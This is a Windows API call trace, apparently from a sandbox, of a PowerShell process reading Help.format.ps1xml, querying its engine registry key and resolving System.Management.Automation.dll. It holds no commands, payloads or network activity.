	[0350.590] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.590] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.591] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.591] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.591] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.591] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.591] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.592] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.592] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.592] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.974] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.974] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.974] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.974] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.975] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.975] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.975] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.975] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.975] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.976] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.976] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.976] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.976] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.976] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.977] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.977] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.979] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.979] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.979] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.980] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.980] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.980] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.980] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.980] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.981] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.981] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.981] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.981] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.982] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.982] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.982] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.982] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.982] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.983] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.983] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.983] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.983] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.983] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.984] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.984] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.984] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.984] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.984] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.985] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.985] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.985] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.985] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0xf37, lpOverlapped=0x0) returned 1
	[0350.985] ReadFile (in: hFile=0x320, lpBuffer=0x3577e2f, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3577e2f*, lpNumberOfBytesRead=0x1cd4b8*=0x0, lpOverlapped=0x0) returned 1
	[0350.985] ReadFile (in: hFile=0x320, lpBuffer=0x3578790, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3578790*, lpNumberOfBytesRead=0x1cd4b8*=0x0, lpOverlapped=0x0) returned 1
	[0350.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0350.986] SetErrorMode (uMode=0x1) returned 0x1
	[0350.986] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd460 | out: lpFileInformation=0x1cd460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0350.986] SetErrorMode (uMode=0x1) returned 0x1
	[0350.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0350.986] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd548 | out: phkResult=0x1cd548*=0x320) returned 0x0
	[0350.986] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd4cc, lpData=0x0, lpcbData=0x1cd4c8*=0x0 | out: lpType=0x1cd4cc*=0x1, lpData=0x0, lpcbData=0x1cd4c8*=0x56) returned 0x0
	[0350.986] CoTaskMemAlloc (cb=0x5a) returned 0x46ed50
	[0350.986] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd49c, lpData=0x46ed50, lpcbData=0x1cd498*=0x56 | out: lpType=0x1cd49c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd498*=0x56) returned 0x0
	[0350.986] CoTaskMemFree (pv=0x46ed50) 
	[0350.986] RegCloseKey (hKey=0x320) returned 0x0
	[0350.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0350.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0350.996] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x8a1e92a, Data2=0x2b36, Data3=0x499e, Data4=([0]=0x80, [1]=0x2c, [2]=0x3f, [3]=0x72, [4]=0xac, [5]=0xc6, [6]=0x7e, [7]=0x4f))) returned 0x0
	[0350.996] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xc20983dd, Data2=0xc97a, Data3=0x46a5, Data4=([0]=0x88, [1]=0x8a, [2]=0xa1, [3]=0x43, [4]=0xf6, [5]=0xb9, [6]=0x40, [7]=0xc2))) returned 0x0
	[0350.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0350.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0350.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0350.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.337] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x903bfd1b, Data2=0x210, Data3=0x4ef8, Data4=([0]=0x92, [1]=0xdd, [2]=0xb, [3]=0xd4, [4]=0x7a, [5]=0x93, [6]=0x73, [7]=0xcc))) returned 0x0
	[0351.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
